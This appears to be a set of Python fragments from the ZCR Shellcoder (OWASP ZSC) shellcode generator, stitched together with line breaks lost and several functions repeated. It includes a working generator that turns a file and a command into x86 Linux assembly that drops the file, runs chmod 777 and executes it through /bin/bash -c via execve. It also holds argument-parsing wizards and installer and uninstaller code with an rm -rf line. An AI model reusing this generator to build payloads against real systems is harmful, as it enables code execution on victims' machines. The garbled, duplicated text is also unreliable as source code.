def main(): #main function ''' main function of ZCR Shellcoder ''' if argv_control.exist() is not True: #if execute without any argv start.start() #show start page and exit else: if argv_control.check() is True: #check argv, if entered accurately analyser.do(argv_control.run()) #go for generating start.sig() #print software signature and exit else: start.inputcheck()
def main(): ''' main function of ZCR Shellcoder ''' if argv_control.exist() is not True: process = start.start() sys.exit(0) if argv_control.exist() is True: process_check = False if argv_control.check() is True: process_check = True analyser.do(argv_control.run()) start.sig() if process_check is False: start.inputcheck()
def run(): counter = 0 total_counter = 0 os_counter = 0 filename_counter = 0 job_counter = 0 encode_counter = 0 for argv_check in sys.argv: if argv_check == '-os': counter += 1 os_counter = total_counter + 1 if argv_check == '-o': counter += 1 filename_counter = total_counter + 1 if argv_check == '-job': counter += 1 job_counter = total_counter + 1 if argv_check == '-encode': counter += 1 encode_counter = total_counter + 1 total_counter += 1 if counter is 4: checkargv = True if checkargv is False: start.inputcheck() checkargv = False if start.oslist(sys.argv[os_counter]) is not True: return checkargv if start.types(sys.argv[encode_counter]) is not True: return checkargv if start.joblist(sys.argv[job_counter]) is not True: return checkargv try: writer = open(sys.argv[filename_counter], 'w') writer.write('') writer.close() except: print( color.color('red') + 'File is not writable, Try other name or change directory' + color.color('reset')) sys.exit(start.sig()) os = sys.argv[os_counter] filename = sys.argv[filename_counter] encode = sys.argv[encode_counter] job = sys.argv[job_counter] content = os + '\x90\x90\x90' + filename + '\x90\x90\x90' + encode + '\x90\x90\x90' + job return content
def run(): counter = 0 total_counter = 0 os_counter = 0 filename_counter = 0 job_counter = 0 encode_counter = 0 for argv_check in sys.argv: if argv_check == '-os': counter += 1 os_counter = total_counter + 1 if argv_check == '-o': counter += 1 filename_counter = total_counter + 1 if argv_check == '-job': counter += 1 job_counter = total_counter + 1 if argv_check == '-encode': counter += 1 encode_counter = total_counter + 1 total_counter += 1 if counter is 4: checkargv = True if checkargv is False: start.inputcheck() checkargv = False if start.oslist(sys.argv[os_counter]) is not True: return checkargv if start.types(sys.argv[encode_counter]) is not True: return checkargv if start.joblist(sys.argv[job_counter]) is not True: return checkargv try: writer = open(sys.argv[filename_counter],'w') writer.write('') writer.close() except: print (color.color('red')+'File is not writable, Try other name or change directory'+color.color('reset')) sys.exit(start.sig()) os = sys.argv[os_counter] filename = sys.argv[filename_counter] encode = sys.argv[encode_counter] job = sys.argv[job_counter] content = os + '\x90\x90\x90' + filename + '\x90\x90\x90' + encode + '\x90\x90\x90' + job return content
def run(filename,content,command): command = command.replace('[space]',' ') try: cont = binascii.b2a_hex(open(content).read()) except: from core import start print 'Error, Cannot find/open the file %s'%(content) start.sig() sys.exit(0) l = len(cont) -1 n = 0 c = '\\x' for word in cont: c += word n+=1 if n is 2: n = 0 c += '\\x' c = c[:-2] command = 'echo -e "%s" > %s ; chmod 777 %s ; %s'%(str(c),str(filename),str(filename),str(command)) m = len(command) - 1 stack = '' while(m>=0): stack += command[m] m -= 1 stack = stack.encode('hex') shr_counter = 0 shr_counter = len(stack) % 8 zshr_counter = shr_counter shr = None if shr_counter is 2: shr = '\npop %ecx\nshr $0x10,%ecx\nshr $0x8,%ecx\npush %ecx\n' stack = stack[0:2] + '909090' + stack[2:] if shr_counter is 4: shr = '\npop %ecx\nshr $0x10,%ecx\npush %ecx\n' stack = stack[0:4] + '9090' + stack[4:] if shr_counter is 6: shr = '\npop %ecx\nshr $0x8,%ecx\npush %ecx\n' stack = stack[0:6] + '90' + stack[6:] zshr = shr m = len(stack) n = len(stack) / 8 file_shellcode = '' shr_counter = len(stack) % 8 if shr_counter is 0: shr_n = 0 r = '' while(n is not 0): if shr is not None: shr_n += 1 zx = m - 8 file_shellcode = 'push $0x' + str(stack[zx:m]) + '\n' + file_shellcode m -= 8 n = n - 1 shr = None if shr is None: shr_n += 1 zx = m - 8 file_shellcode = 'push $0x' + str(stack[zx:m]) + '\n' + file_shellcode m -= 8 n = n - 1 if zshr is None: file_z = file_shellcode if zshr is not None: rep1 = file_shellcode[:16] rep2 = rep1 + zshr file_z = file_shellcode.replace(rep1,rep2) shellcode = '''push $0xb pop %%eax cltd push %%edx %s mov %%esp,%%esi push %%edx push $0x632d9090 pop %%ecx shr $0x10,%%ecx push %%ecx mov %%esp,%%ecx push %%edx push $0x68 push $0x7361622f push $0x6e69622f mov %%esp,%%ebx push %%edx push %%edi push %%esi push %%ecx push %%ebx mov %%esp,%%ecx int $0x80 '''%(str(file_z)) return shellcode
def check(): checkargv = False if len(sys.argv) is 2: if str(sys.argv[1]) == '-oslist': checkargv = True start.oslist(1) if str(sys.argv[1]) == '-joblist': checkargv = True start.joblist(1) if str(sys.argv[1]) == '-types': checkargv = True start.types(1) if str(sys.argv[1]) == '-h': checkargv = True start.menu() if str(sys.argv[1]) == '--h': checkargv = True start.menu() if str(sys.argv[1]) == '-help': checkargv = True start.menu() if str(sys.argv[1]) == '--help': checkargv = True start.menu() if str(sys.argv[1]) == '-update': checkargv = True start.update() if str(sys.argv[1]) == '-about': checkargv = True start.about() if str(sys.argv[1]) == '-wizard': checkargv = True start.zcr() try: t = True print ('\n'+color.color('yellow')+'Default OS Name is linux_x86, Enter OS Name or Enter "list" to see OS List') while t: if version is 2: osname = raw_input(color.color('cyan')+'OS Name: '+color.color('white')).replace('\n','') if version is 3: osname = input(color.color('cyan')+'OS Name: '+color.color('white')).replace('\n','') if osname == '': osname = 'linux_x86' check = start.oslist(osname) if osname == 'list': start.os_names_list() check = 1 if check is True: print (color.color('blue')+'OS Name set to "%s%s%s"'%(color.color('red'),osname,color.color('blue'))) t = False if check is not True and check is not 1: print (color.color('red')+'Wrong Input' ) t = True print ('\n'+color.color('yellow')+'Default Job is exec(\'/bin/bash\'), Enter Job Type or Enter "list" to see Jobs List') while t: if version is 2: job = raw_input(color.color('cyan')+'Job:'+color.color('white')).replace('\n','') if version is 3: job = input(color.color('cyan')+'Job:'+color.color('white')).replace('\n','') if job == '': job = 'exec(\'/bin/bash\')' check = start.job_check(job) if job == 'list': start.job_list() check = 1 if check is True: print (color.color('blue')+'Job set to "%s%s%s"'%(color.color('red'),job,color.color('blue'))) t = False if check is not True and check is not 1: print (color.color('red')+'Wrong Input') t = True print ('\n'+color.color('yellow')+'Default Encode Type is none, Enter Encode Type or Enter "list" to see Encodes List') while t: if version is 2: encode = raw_input(color.color('cyan')+'Encode:'+color.color('white')).replace('\n','') if version is 3: encode = input(color.color('cyan')+'Encode:'+color.color('white')).replace('\n','') if encode == '': encode = 'none' check = start.encode_name_check(encode) if encode == 'list': start.encode_name() check = 1 if check is True: print (color.color('blue')+'Encode Type set to "%s%s%s"'%(color.color('red'),encode,color.color('blue'))) t = False if check is not True and check is not 1: print (color.color('red')+'Wrong Input') t = True print ('\n'+color.color('yellow')+'Default Filename is shellcode.c, Enter Filename or Just Enter to skip') while t: if version is 2: filename = raw_input(color.color('cyan')+'Filename: '+color.color('white')).replace('\n','') if version is 3: filename = input(color.color('cyan')+'Filename: '+color.color('white')).replace('\n','') if filename == '': filename = 'shellcode.c' check = False try: file = open(filename,'w') file.write('') file.close() check = True except: check = False if check is True: print (color.color('blue')+'Filename set to "%s%s%s"'%(color.color('red'),filename,color.color('blue'))) t = False if check is False: print (color.color('red')+'File is not writable, Try other name or change directory') except (KeyboardInterrupt, SystemExit): sys.exit('\n\nAborted by user.\n') except: sys.exit('\n\nAborted by user.\n') checkargv = True if start.oslist(osname) is not True: checkargv = False if start.types(encode) is not True: checkargv = False if start.joblist(job) is not True: checkargv = False if checkargv is False: start.inputcheck() content = osname + '\x90\x90\x90' + filename + '\x90\x90\x90' + encode + '\x90\x90\x90' + job analyser.do(content) sys.exit(start.sig()) if checkargv is False: start.inputcheck() return checkargv if len(sys.argv) > 2: checkargv = True for argv_check in sys.argv: if argv_check == '-h': checkargv = False if argv_check == '--h': checkargv = False if argv_check == '-help': checkargv = False if argv_check == '--help': checkargv = False if argv_check == '-types': checkargv = False if argv_check == '-oslist': checkargv = False if argv_check == '-joblist': checkargv = False if argv_check == '-update': checkargv = False if argv_check == '-wizard': checkargv = False if checkargv is False: start.inputcheck() checkargv = False counter = 0 total_counter = 0 os_counter = 0 filename_counter = 0 job_counter = 0 encode_counter = 0 for argv_check in sys.argv: if argv_check == '-os': counter += 1 os_counter = total_counter + 1 if argv_check == '-o': counter += 1 filename_counter = total_counter + 1 if argv_check == '-job': counter += 1 job_counter = total_counter + 1 if argv_check == '-encode': counter += 1 encode_counter = total_counter + 1 total_counter += 1 if counter is 4: checkargv = True if checkargv is False: start.inputcheck() checkargv = False if start.oslist(sys.argv[os_counter]) is not True: return checkargv if start.types(sys.argv[encode_counter]) is not True: return checkargv if start.joblist(sys.argv[job_counter]) is not True: return checkargv checkargv = True return checkargv
#!/usr/bin/env python ''' ZCR Shellcoder ZeroDay Cyber Research Z3r0D4y.Com Ali Razmjoo ''' import os import sys from core import start from core import color if 'linux' in sys.platform: os.system('clear') else: sys.exit( color.color('red') + 'Sorry, This version of software just could be run on linux.' + color.color('reset')) start.zcr() print color.color('green') + 'Removing Files' + color.color('white') os.system('rm -rf /usr/share/owasp_zsc /usr/bin/zsc') print color.color('green') + 'Files Removed!' + color.color('white') start.sig()
except: pass print(color.color('green') + 'Copying Files' + color.color('white')) tmp_copy = os.popen('xcopy /y /s /i . %s' % installing_path).read() print(color.color('cyan') + 'Building Commandline') tmp_add_command_line = open('%s\\..\\zsc.bat' % installing_path, 'w') tmp_add_command_line.write('@echo off\npython %s\\zsc.py %%*' % installing_path) tmp_add_command_line.close() print( color.color('yellow') + '\nNow you can remove this folder\nfiles copied in %s.\nto run zcr shellcoder please use "zsc" command line\nNOTE: IF COMMAND LINE "zsc" NOT FOUND, PLEASE RE-OPEN YOUR CMD!\n' % installing_path + color.color('reset')) if 'linux' in sys.platform: os.system('clear') linux() elif 'darwin' in sys.platform: os.system('clear') osx() elif 'win32' in sys.platform or 'win64' in sys.platform: os.system('cls') windows() else: sys.exit( color.color('red') + 'OWASP ZSC currently supports install on windows/linux/osx only, for other platforms please copy source files to a directory and run' + color.color('reset')) start.sig()
def check(): checkargv = False if len(sys.argv) is 2: if str(sys.argv[1]) == '-oslist': checkargv = True start.oslist(1) if str(sys.argv[1]) == '-joblist': checkargv = True start.joblist(1) if str(sys.argv[1]) == '-types': checkargv = True start.types(1) if str(sys.argv[1]) == '-h': checkargv = True start.menu() if str(sys.argv[1]) == '--h': checkargv = True start.menu() if str(sys.argv[1]) == '-help': checkargv = True start.menu() if str(sys.argv[1]) == '--help': checkargv = True start.menu() if str(sys.argv[1]) == '-update': checkargv = True start.update() if str(sys.argv[1]) == '-about': checkargv = True start.about() if str(sys.argv[1]) == '-wizard': checkargv = True start.zcr() try: t = True print( '\n' + color.color('yellow') + 'This version has one OS available which is linux_x86 (by Default), Enter OS Name or Enter "list" to see future OS List' ) while t: if version is 2: osname = raw_input( color.color('cyan') + 'OS Name: ' + color.color('white')).replace('\n', '') if version is 3: osname = input( color.color('cyan') + 'OS Name: ' + color.color('white')).replace('\n', '') if osname == '': osname = 'linux_x86' check = start.oslist(osname) if osname == 'list': start.os_names_list() check = 1 if check is True: print( color.color('blue') + 'OS Name set to "%s%s%s"' % (color.color('red'), osname, color.color('blue'))) t = False if check is not True and check is not 1: print(color.color('red') + 'Wrong Input') t = True print( '\n' + color.color('yellow') + 'Default Job is exec(\'/bin/bash\'), Enter Job Type or Enter "list" to see Jobs List' ) while t: if version is 2: job = raw_input( color.color('cyan') + 'Job:' + color.color('white')).replace('\n', '') if version is 3: job = input( color.color('cyan') + 'Job:' + color.color('white')).replace('\n', '') if job == '': job = 'exec(\'/bin/bash\')' check = start.job_check(job) if job == 'list': start.job_list() check = 1 if check is True: print( color.color('blue') + 'Job set to "%s%s%s"' % (color.color('red'), job, color.color('blue'))) t = False if check is not True and check is not 1: print(color.color('red') + 'Wrong Input') t = True print( '\n' + color.color('yellow') + 'Default Encode Type is none, Enter Encode Type or Enter "list" to see Encodes List' ) while t: if version is 2: encode = raw_input( color.color('cyan') + 'Encode:' + color.color('white')).replace('\n', '') if version is 3: encode = input( color.color('cyan') + 'Encode:' + color.color('white')).replace('\n', '') if encode == '': encode = 'none' check = start.encode_name_check(encode) if encode == 'list': start.encode_name() check = 1 if check is True: print( color.color('blue') + 'Encode Type set to "%s%s%s"' % (color.color('red'), encode, color.color('blue'))) t = False if check is not True and check is not 1: print(color.color('red') + 'Wrong Input') t = True print( '\n' + color.color('yellow') + 'Default Filename is shellcode.c, Enter Filename or Just Enter to skip' ) while t: if version is 2: filename = raw_input( color.color('cyan') + 'Filename: ' + color.color('white')).replace('\n', '') if version is 3: filename = input( color.color('cyan') + 'Filename: ' + color.color('white')).replace('\n', '') if filename == '': filename = 'shellcode.c' check = False try: file = open(filename, 'w') file.write('') file.close() check = True except: check = False if check is True: print( color.color('blue') + 'Filename set to "%s%s%s"' % (color.color('red'), filename, color.color('blue')) ) t = False if check is False: print( color.color('red') + 'File is not writable, Try other name or change directory' ) except (KeyboardInterrupt, SystemExit): sys.exit('\n\nAborted by user.\n') except: sys.exit('\n\nAborted by user.\n') checkargv = True if start.oslist(osname) is not True: checkargv = False if start.types(encode) is not True: checkargv = False if start.joblist(job) is not True: checkargv = False if checkargv is False: start.inputcheck() content = osname + '\x90\x90\x90' + filename + '\x90\x90\x90' + encode + '\x90\x90\x90' + job analyser.do(content) sys.exit(start.sig()) if checkargv is False: start.inputcheck() return checkargv if len(sys.argv) > 2: checkargv = True for argv_check in sys.argv: if argv_check == '-h': checkargv = False if argv_check == '--h': checkargv = False if argv_check == '-help': checkargv = False if argv_check == '--help': checkargv = False if argv_check == '-types': checkargv = False if argv_check == '-oslist': checkargv = False if argv_check == '-joblist': checkargv = False if argv_check == '-update': checkargv = False if argv_check == '-wizard': checkargv = False if checkargv is False: start.inputcheck() checkargv = False counter = 0 total_counter = 0 os_counter = 0 filename_counter = 0 job_counter = 0 encode_counter = 0 for argv_check in sys.argv: if argv_check == '-os': counter += 1 os_counter = total_counter + 1 if argv_check == '-o': counter += 1 filename_counter = total_counter + 1 if argv_check == '-job': counter += 1 job_counter = total_counter + 1 if argv_check == '-encode': counter += 1 encode_counter = total_counter + 1 total_counter += 1 if counter is 4: checkargv = True if checkargv is False: start.inputcheck() checkargv = False if start.oslist(sys.argv[os_counter]) is not True: return checkargv if start.types(sys.argv[encode_counter]) is not True: return checkargv if start.joblist(sys.argv[job_counter]) is not True: return checkargv checkargv = True return checkargv